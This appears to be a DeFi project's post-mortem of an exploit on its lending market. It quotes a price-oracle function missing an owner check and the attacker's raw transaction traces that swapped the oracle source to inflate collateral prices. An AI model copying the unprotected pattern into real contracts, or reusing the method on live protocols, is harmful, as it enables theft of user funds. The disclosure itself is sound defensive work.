On Jun, 22, 2022, Coslend lending market has been exploited.

The hacker “borrowed” all the funds from Coslend lending market, through manipulating the prices of collaterals.

The total loss:
~64,305.596 USDC
~9,604.913 USDT
~1,826.745 FRAX
~14.2980 WETH

The hacker transfered the funds from EVMOS mainnet to Ethereum mainnet through Nomad, and then to Polygon through Celer.

Finally, the hacker swapped all the funds to $MATIC, and then put all the $MATIC tokens into Tornadocash.

In Coslend PriceOracle V1 contract, there is a method to update oracle source, but it missed an important permission check, the `onlyOwner` check.

function updateSource(address marketToken,uint index,address source,string memory sourceType,bool available) public {
TokenConfig storage tokenConfig = tokenConfigs[marketToken];
PriceOracle storage priceOracle = tokenConfig.oracles[index];
priceOracle.source =source;
priceOracle.available = available;
priceOracle.sourceType = sourceType;
}

Based on this vulnerability, the hacker implemented 2 attack txs:

  1. 0xc1c3828e7f47cd782f03536b54daaac66065be0cb7e992cee76e4729ad2fdfcf
  2. 0x7b2a5f7d3d770db7e7994dff87356ff653cdb6367ee1bef8d8e6fe37f3ecbd98

Technical details of transaction 1:

  1. The hacker used `updateSource` method to change the oracle source to `0x8d3103F84998EF6ae90ac5e974Af6290ef2C1037`
{
"calls": [
{
"from": "0x1cf161b64b201cb3e5e97f255e84a858fd800faf",
"gas": "0x11fcfb2",
"gasUsed": "0x278a",
"input": "0x66c8ea9400000000000000000000000011a7ec40a34cf6bb07414f3690b41eb94bf121eb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000008d3103f84998ef6ae90ac5e974af6290ef2c103700000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000006437573746f6d0000000000000000000000000000000000000000000000000000",
"output": "0x",
"to": "0x64e7d35626494a375fbf0cd1bacc5af26cd0cb17",
"type": "DELEGATECALL"
}
],
"from": "0xd74f0ca17ca367e746dee201271949fc7dea3d54",
"gas": "0x124646d",
"gasUsed": "0x2ae7",
"input": "0x66c8ea9400000000000000000000000011a7ec40a34cf6bb07414f3690b41eb94bf121eb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000008d3103f84998ef6ae90ac5e974af6290ef2c103700000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000006437573746f6d0000000000000000000000000000000000000000000000000000",
"output": "0x",
"to": "0x1cf161b64b201cb3e5e97f255e84a858fd800faf",
"type": "CALL",
"value": "0x0"
},

2. Set the WETH price at `9.094947017729283e+37`.

3. The hacker borrowed 9604.913184 USDT, 64305.595548 USDC and 1826.7445016751678 FRAX.

4. The hacker used `updateSource` method again, changed the oracle source back to original source.

{
"calls": [
{
"from": "0x1cf161b64b201cb3e5e97f255e84a858fd800faf",
"gas": "0x11197a5",
"gasUsed": "0x976",
"input": "0x66c8ea9400000000000000000000000011a7ec40a34cf6bb07414f3690b41eb94bf121eb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c8f111a1048fec7ea9c9cbab96a2cb5d1b9456000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000004466c757800000000000000000000000000000000000000000000000000000000",
"output": "0x",
"to": "0x64e7d35626494a375fbf0cd1bacc5af26cd0cb17",
"type": "DELEGATECALL"
}
],
"from": "0xd74f0ca17ca367e746dee201271949fc7dea3d54",
"gas": "0x115f299",
"gasUsed": "0xcd3",
"input": "0x66c8ea9400000000000000000000000011a7ec40a34cf6bb07414f3690b41eb94bf121eb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c8f111a1048fec7ea9c9cbab96a2cb5d1b9456000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000004466c757800000000000000000000000000000000000000000000000000000000",
"output": "0x",
"to": "0x1cf161b64b201cb3e5e97f255e84a858fd800faf",
"type": "CALL",
"value": "0x0"
}

Technical details of transaction 2:

Similar as transaction 1, the hacker set the USDC price at`1.00008693e+30` and then “borrowed” 14.298043896860449 WETH.

The Coslend team will implement a fix for this issue, add the “onlyOwner” check.

  1. Borrowing, withdrawal have been suspended, after the exploit to avoid further losses.
  2. Supply has been suspended after our tests on contracts.
  3. Get in touch with the EVMOS team for more tx details.
  4. Get in touch with the Nomad team for more details of their bridge token contracts → No problems have been found
  5. Get in touch with the Flux team for more details of their oracle contracts → No problems have been found
  6. Thanks to Kenesis team for their care and advice, it’s so sweet.
  7. Due to the current imperfect infrastructures, we spent more time on building data analysis tools and eventually successfully identified the reason of this accident.

We will work out an improvement plan and a compensation plan as soon as possible based on the current situation.

Stay tuned!

We encourage the hacker to reach out and start a conversation with us for the return of our users’ funds.

We will honor a bug bounty of 10% upon return of funds.